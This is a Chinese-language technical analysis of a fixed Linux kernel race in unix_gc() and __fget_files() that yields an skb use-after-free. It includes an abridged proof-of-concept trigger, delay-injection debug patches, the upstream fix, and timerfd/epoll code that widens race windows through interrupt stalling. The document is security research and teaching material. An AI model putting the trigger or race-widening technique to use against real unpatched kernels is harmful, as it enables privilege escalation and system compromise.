2023-03-10

Linux 内核利用技巧 Racing against the clock

author: 熊潇 of IceSword Lab

概述

原文: Racing against the clock – hitting a tiny kernel race window

Part.1: 漏洞原理简述
Part.2: 对比较容易产生疑惑的地方增加了细节说明
Part.3: 针对文中提高 race 的技巧做了分析

Part.1

The bug & race

The kernel tries to figure out whether it can account for all references to some file by comparing the file’s refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.

The problem is that struct file can also be referenced from an RCU read-side critical section (which you can’t detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using get_file_rcu() / get_file_rcu_many() by __fget_files() as long as the refcount is non-zero.

unix_gc() 的预期逻辑是: total_refs 和 inflight_refs 相同就可以认为此时 file 是单独占有的，就可以把 skb 和 file 一起 free 掉
下面代码 (3) 在 (1) 和 (2)中间执行则 race 成功
如果 race 没有成功，__fget_files 那里就会发现 f_count 是 0 或者 file 是 NULL
但是如果 race 成功的话，file->f_count 在 __fget_files() 中会被加 1 ，在 unix_gc 后面的代码中就不会被释放 file 的内存，而只是把 f_count 减 1，这也意味着在 close() 之后依然可以 dup() 成功

dup() -> __fget_files()
    file = files_lookup_fd_rcu(files, fd); // fdt->fd[fd] (1)
    ...
    get_file_rcu_many(file, refs) // update: f_count+1 (2)

close() -> unix_gc()
		list_for_each_entry_safe(u, next, &gc_inflight_list, link) {
	    total_refs = file_count(u->sk.sk_socket->file);  // read f_count: 1 (3)
	    inflight_refs = atomic_long_read(&u->inflight);  // inflight_refs: 1
	    ...
			if (total_refs == inflight_refs) { // compare 
				list_move_tail(&u->link, &gc_candidates);
		        ...

unix_gc() 中 file 和 skb 没有同步释放可能造成的影响？

下面这个方式可以触发 skb UAF:

socketpair() // 获取 socket pair fds: 3, 4
sendmsg(4, 3)  // 通过 fd 4 发送 fd 3
	-> skb_queue_tail(&other->sk_receive_queue, skb); // other 是 fd 4 的 peer 也就是 fd 3， skb 保存了 fd 4 发送的内容也是 fd 3
close(3) | dup(3) // close 和 dup 存在 race，dup 如果 race 成功会返回 fd  3
recvmsg(3)  // 通过 fd 3 接收 fd 4 发送的 skb
	-> last = skb = skb_peek(&sk->sk_receive_queue); // 此时 skb 对应的内存已经被 free 了

skb uaf:

allocated in: sendmsg() -> unix_stream_sendmsg()
freed in: close() -> unix_gc()
uafed in: recvmsg() -> unix_stream_read_generic()

Part.2

SCM_RIGHTS unix socket

SCM_RIGHTS is a socket control message used for passing file descriptors between processes over a UNIX domain socket.

It allows a process to send an open file descriptor to another process, which can then use the file descriptor to read or write to the same file or device.

example

sender.c

#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/un.h>

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <file_path>\n", argv[0]);
        return 1;
    }

    char *file_path = argv[1];

    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
    if (sock == -1) {
        perror("socket");
        return 1;
    }

    struct sockaddr_un addr;
    memset(&addr, 0, sizeof(addr));
    addr.sun_family = AF_UNIX;
    strncpy(addr.sun_path, "/tmp/file_transfer.sock", sizeof(addr.sun_path) - 1);

    if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
        perror("connect");
        return 1;
    }

    int fd = open(file_path, O_RDONLY);
    if (fd == -1) {
        perror("open");
        return 1;
    }

    struct msghdr msg = {0};
    char buf[CMSG_SPACE(sizeof(fd))];
    memset(buf, 0, sizeof(buf));

    struct iovec io = { .iov_base = "hello", .iov_len = 5 };
    msg.msg_iov = &io;
    msg.msg_iovlen = 1;

    msg.msg_control = buf;
    msg.msg_controllen = sizeof(buf);

    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
    *((int *) CMSG_DATA(cmsg)) = fd;

    if (sendmsg(sock, &msg, 0) == -1) {
        perror("sendmsg");
        return 1;
    }

    close(fd);
    close(sock);

    return 0;
}

recver.c

#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/un.h>

int main(int argc, char *argv[]) {
    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
    if (sock == -1) {
        perror("socket");
        return 1;
    }

    struct sockaddr_un addr;
    memset(&addr, 0, sizeof(addr));
    addr.sun_family = AF_UNIX;
    strncpy(addr.sun_path, "/tmp/file_transfer.sock", sizeof(addr.sun_path) - 1);

    if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
        perror("bind");
        return 1;
    }

    if (listen(sock, 1) == -1) {
        perror("listen");
        return 1;
    }

    int client_sock = accept(sock, NULL, NULL);
    if (client_sock == -1) {
        perror("accept");
        return 1;
    }

    char buf[256];
    struct iovec io = { .iov_base = buf, .iov_len = sizeof(buf) };
    struct msghdr msg = {
			.msg_iov = &io,
	    .msg_iovlen = 1
		};

		char control[CMSG_SPACE(sizeof(int))];
		msg.msg_control = control;
		msg.msg_controllen = sizeof(control);
		
		if (recvmsg(client_sock, &msg, 0) == -1) {
		    perror("recvmsg");
		    return 1;
		}
		
		struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
		if (cmsg == NULL || cmsg->cmsg_type != SCM_RIGHTS) {
		    printf("Invalid message\n");
		    return 1;
		}
		
		int fd = *((int *) CMSG_DATA(cmsg));
		if (fd == -1) {
		    perror("No file descriptor received");
		    return 1;
		}
		
		// Do something with the received file descriptor
		char buf2[256];
		ssize_t bytes_read;
		while ((bytes_read = read(fd, buf2, sizeof(buf2))) > 0) {
		    printf("%s", buf2);
		}
		
		close(fd);
		close(client_sock);
		close(sock);

		return 0;
}

Unix socket `sendmsg()` and `recvmsg()`

用于发送和接收 SCM_RIGHTS unix socket 数据的主要处理函数是: unix_stream_sendmsg 和 unix_stream_read_generic
特殊的地方在于：
- sendmsg 的时候会创建 skb 并放在全局列表 gc_inflight_list 和接收端的 sk_receive_queue 上
- 发送的 fd 对应的 file 会绑定到 skb 上(f_count 也会加 1)
- recvmsg 的时候从 sk_receive_queue 取 skb
- unix_gc 则从 gc_inflight_list 取 skb

// net/socket.c
sendmsg() -> __sys_sendmsg() -> sock_sendmsg()-> sock_sendmsg_nosec() 
	-> // sock->ops->sendmsg
     unix_stream_sendmsg() // struct unix_stream_ops 
        **__scm_send()** 
            scm_fp_copy()
                fget_raw(fd)
										...
	                __fget_files() // 每个被传递的 fd 引用加 1
        other = unix_peer(sk);
        skb = sock_alloc_send_pskb()
        **unix_scm_to_skb()**
            unix_attach_fds() // fd 与 skb 绑定
                unix_inflight()
	                list_add_tail(&u->link, &**gc_inflight_list**); // unix_gc 处理的队列 
						 **skb->destructor = unix_destruct_scm;** // 注册 skb destruct
****        skb_queue_tail(&other->**sk_receive_queue**, skb); // skb 直接放到 peer 的 sk_receive_queue 队列上

recvmsg() -> __sys_recvmsg() -> ...
	-> // sock->ops->recvmsg
     unix_stream_recvmsg()
        unix_stream_read_generic()
            last = skb = skb_peek(&sk->sk_receive_queue);// 取 skb
            scm_recv() // 处理 fd
                scm_detach_fds()
											receive_fd_user() // 接收 fd
												..
													fd_install(new_fd, get_file(file));
                    __scm_destroy() // 释放 skb 绑定的 fd 引用
                        fput()
                          fput_many()

**struct sk_buff *skb, struct unix_sock *u, struct socket *sock, struct sock *sk 和 struct file *file 之间的关系？**

struct socket *sock = &container_of(file->f_inode, 
																struct socket_alloc, vfs_inode)->socket
struct sock *sk = sock->sk

struct unix_sock *u = (struct unix_sock *)sk

struct file *file = u->sk.sk_socket->file

struct file *file = (*(struct unix_skb_parms *)&((skb)->cb)).fp->fp[i]

`unix_gc()` 做了什么？

遍历 gc_inflight_list 获取 unix_sock 对象
- 把满足条件的 unix_sock 添加到 gc_candidates
- 条件：unix_sock 的文件引用和 skb 引用值相同
遍历 gc_candidates
- 把满足条件的 skb 添加到 hitlist
释放 hitlist 上的 skb 内存和与之绑定的 struc file

unix_gc()
	struct sk_buff_head hitlist;
	...
	list_for_each_entry_safe(u, next, &gc_inflight_list, link) {
		total_refs = file_count(u->sk.sk_socket->file);
		inflight_refs = atomic_long_read(&u->inflight);
		if (total_refs == inflight_refs) {
			list_move_tail(&u->link, &gc_candidates);
	}
	...

	skb_queue_head_init(&hitlist);
	list_for_each_entry(u, &gc_candidates, link)
		scan_children(&u->sk, inc_inflight, &hitlist);
			scan_inflight(&u->sk, func, hitlist);
				__skb_queue_tail(hitlist, skb);
	...
	__skb_queue_purge(&hitlist);
		kfree_skb(skb);

unix_gc() 中 file 和 skb 在哪里 free ?

unix_gc()
	...
	skb_queue_head_init(&hitlist);
	list_for_each_entry(u, &gc_candidates, link) // 从gc_candidates取skb到hitlist
		scan_children(&u->sk, inc_inflight, NULL);
			scan_inflight(&u->sk, func, hitlist);
				__skb_queue_tail(hitlist, skb);
	...
	__skb_queue_purge(&hitlist); // (4)
		kfree_skb(skb);
		...
			**skb->destructor() // 在 sendmsg 设置
				unix_destruct_scm()**
					scm_destroy()
						__scm_destroy()
							**fput() // 如果 f_count 是 1 则减到 0 然后释放 file**
			kfree_skbmem()
				**kmem_cache_free(.., skb) // 释放 skb**

// unix_destruct_scm 在 sendmsg 设置
sendmsg()
  __sys_sendmsg()
    sock_sendmsg()
      sock_sendmsg_nosec()
        unix_stream_sendmsg() // struct unix_stream_ops 
          skb = sock_alloc_send_pskb()
          unix_scm_to_skb()
							**skb->destructor = unix_destruct_scm;**

`unix_gc()` 何时被调用？

close() 可以间接触发
- 具体入口的 syscall_exit_to_user_mode() - __fput()
sendmsg() 也可以触发但只在队列满的时候
- sendmsg（) - wait_for_unix_gc()

// close() 一个 f_count 为 1 的文件时触发
close()
    close_fd()
        filp_close()
            fput()
	            fput_many(file, 1);
                    atomic_long_sub_and_test(refs, &file->f_count) 
	                    init_task_work(&file->f_u.fu_rcuhead, ____fput)
	                    task_work_add(task, &file->f_u.fu_rcuhead, TWA_RESUME)
entry_SYSCALL_64 
	do_syscall_64
		syscall_exit_to_user_mode
			...
				tracehook_notify_resume
					task_work_run()
						__fput() 
							sock_close()  // (struct file *) ->f_op->release()
								__sock_release() 
									unix_release()  // (struct socket *) ->ops->release()
										unix_release_sock() 
											**unix_gc()**

// 只有 inflight sockets 超过 UNIX_INFLIGHT_TRIGGER_GC（16000) 才会调用
sendmsg()
	...
		unix_stream_sendmsg()/unix_dgram_sendmsg()
			wait_for_unix_gc()
				if (unix_tot_inflight > UNIX_INFLIGHT_TRIGGER_GC && !gc_in_progress)
					**unix_gc();**

dup() 的作用和实现原理？

根据 fd 从 fd table 中获取 struct file *file
如果 f_count 不为 0 则 file->f_count += 1
fd table 中新建一个条目指向 file

SYSCALL_DEFINE1(dup, unsigned int, fildes)
    fget_raw()
        __fget(fd, FMODE_PATH, 1)
            __fget_files(current->files, fd, mask, refs)
									file = files_lookup_fd_rcu(files, fd);// 根据 fd 从 fd table 中获取 struct file *file
                get_file_rcu_many(file, refs) 
										atomic_long_add_unless(&(x)->f_count, (cnt), 0) // if not 0, file->f_count += 1
		get_unused_fd_flags()
		fd_install() // fd table 中新建一个条目指向 file

`close()` 的作用和实现原理？

使 fd 重新可用
把 fd table 中 fd 对应的条目删除(设置为 NULL)
fd table 中原来指向的 struct file 的 f_count 减 1，如果减到 0 则释放 struct file 的内存
close 不一定会立马释放 struct file, 但是用户态不能再访问该 fd，比如dup(fd),read(fd) ..

close()
    close_fd()
        pick_file()
	        fdt = files_fdtable(files);
	        file = fdt->fd[fd];
	        **rcu_assign_pointer(fdt->fd[fd], NULL); // fd table 中 fd 对应的条目删除
	        __put_unused_fd(files, fd); // 使 fd 重新可用**
        filp_close()
            **fput()**
	            fput_many(file, 1); // fd table 中原来指向的 struct file 的 f_count 减 1
                    atomic_long_sub_and_test(refs, &file->f_count)
                    **init_task_work(&file->f_u.fu_rcuhead, ____fput)**
                    task_work_add(task, &file->f_u.fu_rcuhead, TWA_RESUME)

____fput()
	__fput()
		file_free()
			file_free_rcu()
				**kmem_cache_free(filp_cachep, f) // 如果减到 0 则释放 struct file 的内存**

增加 kernel delay patch 的 poc 如何 work ?

line-27 将 pair[0] f_count +1 并添加到 gc_inflight_list 和 sk_receive_queue
line-29 和 line-43 用于触发 unix_gc() 调用, 因为需要一个 f_count 为 1 的 fd 被 close()
line-36 用于等待 resurrect_fn()->dup()->__fget_files() 调用进入 race window 拿到 struct file , 因为 line-37 会把 pair[0] 从 fd table 中移除。 usleep 的时间 100000 us 要小于 kernel patch 的 500ms
line-43 会在 __fget_files() 等待的期间执行 unix_gc() , 在执行到准备释放 skb 的代码时，会等待 line-11 的 dup() 完成。
dup() 完成后执行到 line-16 的 recvmsg() ，内核会等待 line-43 触发的 unix_gc() 完成 skb 的释放
unix_gc() 完成后，recvmsg() 继续执行拿到被释放的 skb，UAF

省略版 POC：

1 void send_fd(int sock, int fd) {
2 ...
3     sendmsg(sock, &msg, 0);
4 }
5
6 int resurrect_fd = -1;
7 int resurrected_fd = -1;
8
9 void *resurrect_fn(void *arg) {
10   prctl(PR_SET_NAME, "SLOW-ME"); // tell kernel to inject mdelay()
11   resurrected_fd = dup(resurrect_fd);
12   prctl(PR_SET_NAME, "resurrect");
13
14   prctl(PR_SET_NAME, "SLOW-RECV");
15 ...
16   int recv_bytes = recvmsg(resurrected_fd, &msg, MSG_DONTWAIT);
17   prctl(PR_SET_NAME, "resurrect");
18
19   return NULL;
20 }
21
22 int main(void) {
23   /* create socketpair  */
24   int pair[2];
25   socketpair(AF_UNIX, SOCK_STREAM, 0, pair);
26
27   send_fd(pair[1], pair[0]);
28
29   int trigger_sock = socket(AF_UNIX, SOCK_DGRAM, 0);
30
31   resurrect_fd = pair[0];
32
33   pthread_t resurrect_thread;
34   pthread_create(&resurrect_thread, NULL, resurrect_fn, NULL);
35
36   usleep(100000); /* wait for fget_raw() to see pointer */
37   close(pair[0]);
38
39   /*
40    * trigger unix GC; has to read file_count() before file inc
41    * but do hitlist kill after file inc
42    */
43   close(trigger_sock);
44
45   /* make sure dup() has really finished */
46   pthread_join(resurrect_thread, NULL);
47
48 }

kernel patch 增加三个 mdelay

@@ -850,6 +852,13 @@ static struct file *__fget_files(struct files_struct *files, unsigned int fd,
 loop:
        file = files_lookup_fd_rcu(files, fd);
        if (file) {
+               if (strcmp(current->comm, "SLOW-ME") == 0) {
+                       pr_warn("slowing lookup of fd %u to file 0x%lx with %ld refs\n",
+                               fd, (unsigned long)file, file_count(file));
**+                       mdelay(500);**
+                       pr_warn("slowed lookup of fd %u to file 0x%lx with %ld refs\n",
+                               fd, (unsigned long)file, file_count(file));
+               }

...
@@ -2631,6 +2633,12 @@ static int unix_stream_read_generic(struct unix_stream_read_state *state,
                last = skb = skb_peek(&sk->sk_receive_queue);
                last_len = last ? last->len : 0;
 
+               if (strcmp(current->comm, "SLOW-RECV") == 0) {
+                       pr_warn("recvmsg: delaying stream receive\n");
+                       mdelay(500);
+                       pr_warn("recvmsg: delayed stream receive\n");
+               }
+
...
@@ -210,8 +212,11 @@ void unix_gc(void)
...
        skb_queue_head_init(&hitlist);
+       if (strcmp(current->comm, "resurrect") == 0) {
+               pr_warn("unix: delaying hitlist setup\n");
+               mdelay(500);
+               pr_warn("unix: hitlist setup delay done\n");
+       }
        list_for_each_entry(u, &gc_candidates, link)
                scan_children(&u->sk, inc_inflight, &hitlist);

fixed patch 如何 work ?

补丁效果：在 race window 期间,如果 fd 对应的 struct file 已经从 fd table 移除，则回退对 f_count 的操作，如果发现回退后变为 0 则直接释放 struct file

diff --git a/fs/file.c b/fs/file.c
index 8627dacfc4246..ad4a8bf3cf109 100644
--- a/fs/file.c
+++ b/fs/file.c
@@ -858,6 +858,10 @@ loop:
 			file = NULL;
 		else if (!get_file_rcu_many(file, refs))
 			goto loop;
+		else if (files_lookup_fd_raw(files, fd) != file) {
+			fput_many(file, refs);
+			goto loop;
+		}
 	}
 	rcu_read_unlock();

Part.3

如何利用 hrtimer 扩大 race 成功率？

timerfd_create + timerfd_settime 可以在指定时间(纳秒)后触发 timer interrupt
timer interrupt handler 会调用 __wake_up_common 遍历 wait queue 并执行回调函数。这意味着 wait queue 越长，处在 interrupt context 的时间越长
利用这一点可以让进程在 race window 中被中断，然后在另一个 CPU 上运行需要与之 race 的进程

wait queue item 在哪里添加和读取 ?

每一个 EPOLL_CTL_ADD 会在 timer_fd 的 wait queue 上添加一个执行 ep_poll_callback 的 entry
在 timerfd_triggered 中从 timer_fd 的 wait queue 中取出 entry

// epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, timer_fds[j]

do_epoll_ctl() // 在 ep_ptable_queue_proc 中添加 wait_queue_enty
	ep_insert(struct eventpoll *ep, ..
		struct ep_pqueue epq;
		init_poll_funcptr(&epq.pt, **ep_ptable_queue_proc**); // epq.pt._qproc = **ep_ptable_queue_proc**
		ep_item_poll(epi, &epq.pt, 1);
			vfs_poll
				timerfd_poll // struct file_operations timerfd_fops.poll
					struct timerfd_ctx *ctx = file->private_data;
					poll_wait(file, &ctx->wqh, wait); // &ctx->wqh: whead, wait: &epq.pt, (include/linux/poll.h)
						**ep_ptable_queue_proc**(struct file *file, wait_queue_head_t *whead, poll_table *pt)
							struct epitem *epi = ep_item_from_epqueue(pt);
							struct eppoll_entry *pwq;
							...
							pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL);
						  ...
							**init_waitqueue_func_entry(&pwq->wait, ep_poll_callback);**
							...
							**add_wait_queue(whead, &pwq->wait); // whead:** &ctx->wqh
							...

struct ep_pqueue {
    poll_table pt;
    struct epitem *epi;
}

struct poll_table_struct {
    poll_queue_proc _qproc; // void (*)(struct file *, wait_queue_head_t *, struct poll_table_struct *)
    __poll_t _key;
}

local_apic_timer_interrupt()
	**hrtimer_interrupt()**
		...
		timerfd_tmrproc()
			**timerfd_triggered()** 
				**spin_lock_irqsave(&ctx->wqh.lock, flags);** // 关中断
****				ctx->expired = 1;
				ctx->ticks++;
				wake_up_locked_poll(**&ctx->wqh**, EPOLLIN);
					**__wake_up_common() // 遍历 wait queue, 执行 callback**
						wait_queue_entry_t *curr, *next;
						**list_for_each_entry_safe_from(curr, next, &wq_head->head, entry)** 
							ret = curr->func(curr, mode, wake_flags, key); // ep_poll_callback
				spin_unlock_irqrestore(&ctx->wqh.lock, flags);

**timerfd_tmrproc 在 timerfd_setup 中设置**

static int timerfd_setup(struct timerfd_ctx *ctx, int flags,
			 const struct itimerspec64 *ktmr)
..
	hrtimer_init(&ctx->t.tmr, clockid, htmode);
	hrtimer_set_expires(&ctx->t.tmr, texp);
	ctx->t.tmr.function = timerfd_tmrproc;

**struct timerfd_ctx, struct file , struct hrtimer 之间的关系**

struct timerfd_ctx *ctx = file->private_data;

struct hrtimer *htmr = &ctx->t.tmr;

struct timerfd_ctx *ctx = container_of(htmr, struct timerfd_ctx, t.tmr);

测试代码：

向 wait queue 中添加 500 * 500 个 entry

#define _GNU_SOURCE

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/epoll.h>
#include <sys/timerfd.h>
#include <sched.h> 
#include <err.h> 

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

#define NUM_EPOLL_INSTANCES 500
#define NUM_DUP_FDS 500
#define NUM_TIMER_WAITERS (NUM_EPOLL_INSTANCES * NUM_DUP_FDS)

#define NSEC_PER_SEC 1000000000UL // 1s = 1000000000ns

void pin_task_to(int pid, int cpu) {
  cpu_set_t cset;
  CPU_ZERO(&cset);
  CPU_SET(cpu, &cset);
  SYSCHK(sched_setaffinity(pid, sizeof(cpu_set_t), &cset));
}
void pin_to(int cpu) { pin_task_to(0, cpu); }

struct timespec get_mono_time(void) {
  struct timespec ts;
  clock_gettime(CLOCK_MONOTONIC, &ts);
  return ts;
}

void ts_add(struct timespec *ts, unsigned long nsecs) {
  ts->tv_nsec += nsecs;
  if (ts->tv_nsec >= NSEC_PER_SEC) {
    ts->tv_sec++;
    ts->tv_nsec -= NSEC_PER_SEC;
  }
}

int main() {
		pin_to(0);
    int timerfd = timerfd_create(CLOCK_MONOTONIC, 0);
    if (timerfd < 0) {
        perror("timerfd_create");
        return 1;
    }

    // 创建 epoll instances
    int epoll_fds[NUM_EPOLL_INSTANCES];
    for (int i = 0; i < NUM_EPOLL_INSTANCES; i++) {
        epoll_fds[i] = epoll_create1(0);
        if (epoll_fds[i] < 0) {
            perror("epoll_create1");
            return 1;
        }
    }

    // dup timer fd  
    int timer_fds[NUM_DUP_FDS];
    for (int i = 0; i < NUM_DUP_FDS; i++) {
        timer_fds[i] = dup(timerfd);
        if (timer_fds[i] < 0) {
            perror("dup");
            return 1;
        }
    }

		// epoll_ctl EPOLL_CTL_ADD 添加到 wait queue
    struct epoll_event ev = { 0 };
    ev.events = EPOLLIN;
    for (int i = 0; i < NUM_EPOLL_INSTANCES; i++) {
        for (int j = 0; j < NUM_DUP_FDS; j++) {
            ev.data.fd = timer_fds[j];
            if (epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, timer_fds[j], &ev) < 0) {
                perror("epoll_ctl");
                return 1;
            }
        }
    }

    struct timespec base_time = get_mono_time();

    struct itimerspec timer_value = { .it_value = base_time };
    ts_add(&timer_value.it_value, 1000 * 1000 * 1000); // timer at +1s

		if (timerfd_settime(timerfd, TFD_TIMER_ABSTIME, &timer_value, NULL) < 0) {
        perror("timerfd_settime");
        return 1;
    }

    for (int i = 0; i < NUM_EPOLL_INSTANCES; i++) {
        int nfds = epoll_wait(epoll_fds[i], &ev, 1, -1);
        if (nfds < 0) {
            perror("epoll_wait");
            return 1;
        }
    }

    unsigned long value;
    read(timerfd, &value, sizeof(value)) == sizeof(value);
    printf("value:  %ld\n", value);
    
    for (int i = 0; i < NUM_EPOLL_INSTANCES; i++) {
        close(epoll_fds[i]);
    }
    for (int i = 0; i < NUM_DUP_FDS; i++) {
        close(timer_fds[i]);
    }
    close(timerfd);
    return 0;

}

如何观测延迟效果？

在 GDB 中可以查看队列中的 entry，数量与设置的一致

b timerfd_triggered
set $head = &ctx.wqh.head
set $node = $head
while $node.next != $head
p $node.next
set $node = $node.next
end
p *$head

加一点 patch 用 rdtsc 可以粗略测量一下延迟效果

**0xffffffff81b8b67e <+49>:	rdtsc**
0xffffffff81b8b680 <+51>:	shl    rdx,0x20
0xffffffff81b8b684 <+55>:	or     rax,rdx
0xffffffff81b8b687 <+58>:	lea    r12,[rbx+0x88]
0xffffffff81b8b68e <+65>:	mov    r14,rax
0xffffffff81b8b691 <+68>:	mov    rdi,r12
0xffffffff81b8b694 <+71>:	call   0xffffffff81bde9d0 <_raw_spin_lock_irqsave>
0xffffffff81b8b699 <+76>:	inc    QWORD PTR [rbx+0xa0]
0xffffffff81b8b6a0 <+83>:	mov    edx,0x1
0xffffffff81b8b6a5 <+88>:	mov    rdi,r12
0xffffffff81b8b6a8 <+91>:	mov    WORD PTR [rbx+0xac],0x1
0xffffffff81b8b6b1 <+100>:	mov    r13,rax
0xffffffff81b8b6b4 <+103>:	mov    esi,0x3
0xffffffff81b8b6b9 <+108>:	call   0xffffffff810ad650 <__wake_up_locked_key>
0xffffffff81b8b6be <+113>:	mov    rsi,r13
0xffffffff81b8b6c1 <+116>:	mov    rdi,r12
0xffffffff81b8b6c4 <+119>:	call   0xffffffff81bde5b0 <_raw_spin_unlock_irqrestore>
**0xffffffff81b8b6c9 <+124>:	rdtsc**

diff --git a/fs/timerfd.c b/fs/timerfd.c
index e9c96a0c79f1..b919b24b4d48 100644
--- a/fs/timerfd.c
+++ b/fs/timerfd.c
@@ -64,11 +64,20 @@ static void timerfd_triggered(struct timerfd_ctx *ctx)
 {
        unsigned long flags;

+    u64 start_time, end_time;
+
+    pr_warn("[%s] %s enter\n", current->comm, __func__);
+
+    asm volatile ("rdtsc; shlq $32, %%rdx; orq %%rdx, %0"
+              : "=a"(start_time) :: "%rdx");
        spin_lock_irqsave(&ctx->wqh.lock, flags);
        ctx->expired = 1;
        ctx->ticks++;
        wake_up_locked_poll(&ctx->wqh, EPOLLIN);
        spin_unlock_irqrestore(&ctx->wqh.lock, flags);
+    asm volatile ("rdtsc; shlq $32, %%rdx; orq %%rdx, %0"
+              : "=a"(end_time) :: "%rdx");
+    pr_warn("[%s] %s exit, %lld\n", current->comm, __func__, end_time - start_time);
 }

系统正常运行的时候 tick 数大概在 3000 ～ 30000, 创建 500 * 500 个 entry 可以使cpu 运行时间增大 3～4 个数量级(测试虚拟机的CPU是单核 2000 MHz)

[ 1134.053250] [swapper/0] timerfd_triggered exit, 2976
[ 1134.053250] [swapper/0] timerfd_triggered enter
[ 1134.053250] [swapper/0] timerfd_triggered exit, 3970
[ 1134.552271] [swapper/0] timerfd_triggered enter
[ 1134.552906] [swapper/0] timerfd_triggered exit, 11616
[ 1175.552958] [swapper/0] timerfd_triggered enter
[ 1175.553871] [swapper/0] timerfd_triggered exit, 32663
[ 1176.052796] [swapper/0] timerfd_triggered enter
[ 1176.053719] [swapper/0] timerfd_triggered exit, 29340
[ 1184.738834] [swapper/0] timerfd_triggered enter
**[ 1184.739757] [swapper/0] timerfd_triggered exit, 27116541 // 500 * 500
...**
[ 1588.076916] [swapper/0] timerfd_triggered enter
**[ 1588.077841] [swapper/0] timerfd_triggered exit, 28924883 // 500 * 500
...**
[ 1596.735608] [swapper/0] timerfd_triggered enter
**[ 1596.736503] [swapper/0] timerfd_triggered exit, 28029898 // 500 * 500**
..
[ 1222.384483] [swapper/0] timerfd_triggered enter
**[ 1222.385381] [swapper/0] timerfd_triggered exit, 8511668 // 100 * 500**
...
[ 1265.026284] [swapper/0] timerfd_triggered enter
**[ 1265.027208] [swapper/0] timerfd_triggered exit, 1202548 // 10 * 500**

一种观测代码被中断位置的方法

原文的附录：

I tried firing an interval timer at 100Hz (using timer_create()), with a signal handler that logs the PC register

代码实现：

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <ucontext.h>
#include <sys/time.h>
#include <sys/user.h>
#include <time.h>
#include <sched.h>
#include <err.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

void pin_task_to(int pid, int cpu) {
  cpu_set_t cset;
  CPU_ZERO(&cset);
  CPU_SET(cpu, &cset);
  SYSCHK(sched_setaffinity(pid, sizeof(cpu_set_t), &cset));
}
void pin_to(int cpu) { pin_task_to(0, cpu); }

void timer_handler(int signum, siginfo_t *info, void *context) {
    ucontext_t *ucontext = (ucontext_t *) context;
    void *pc = (void *) ucontext->uc_mcontext.gregs[REG_RIP];
    long rax = ucontext->uc_mcontext.gregs[REG_RAX];
    printf("Timer fired, PC = %p, rax: %ld\n", pc, rax);
}

int main() {
    pin_to(0);

    // Set up the signal handler for SIGALRM
    struct sigaction sa;
    memset(&sa, 0, sizeof(sa));
    sa.sa_flags = SA_SIGINFO;
    sa.sa_sigaction = timer_handler;
    sigaction(SIGALRM, &sa, NULL);

    // Start the timer
    struct itimerspec its;
    its.it_interval.tv_sec = 0;
    its.it_interval.tv_nsec = 10000000; // 100Hz
    its.it_value = its.it_interval;
    timer_t timerid;
    timer_create(CLOCK_MONOTONIC, NULL, &timerid);
    timer_settime(timerid, 0, &its, NULL);

    // Run a loop to generate some activity
    volatile int i;
    while (1) {
        __asm__ volatile (
						"mov $1, %%rax\n\t" // Move 1 to rax
            "mov $2, %%rax\n\t" // Move 2 to rax
            "mov $3, %%rax\n\t" // Move 3 to rax
            "mov $4, %%rax\n\t" // Move 4 to rax
            "mov $5, %%rax\n\t" // Move 5 to rax
            "mov $6, %%rax\n\t" // Move 6 to rax
            "mov $7, %%rax\n\t" // Move 7 to rax
            "mov $8, %%rax\n\t" // Move 8 to rax
            "mov $9, %%rax\n\t" // Move 9 to rax
            "mov $10, %%rax\n\t" // Move 10 to rax

            : // No output operand
            : // No input operand
            : "%rax" // Clobbered register
        );
        //i = -1; /* 内存写操作 */
    }

    return 0;
}

概述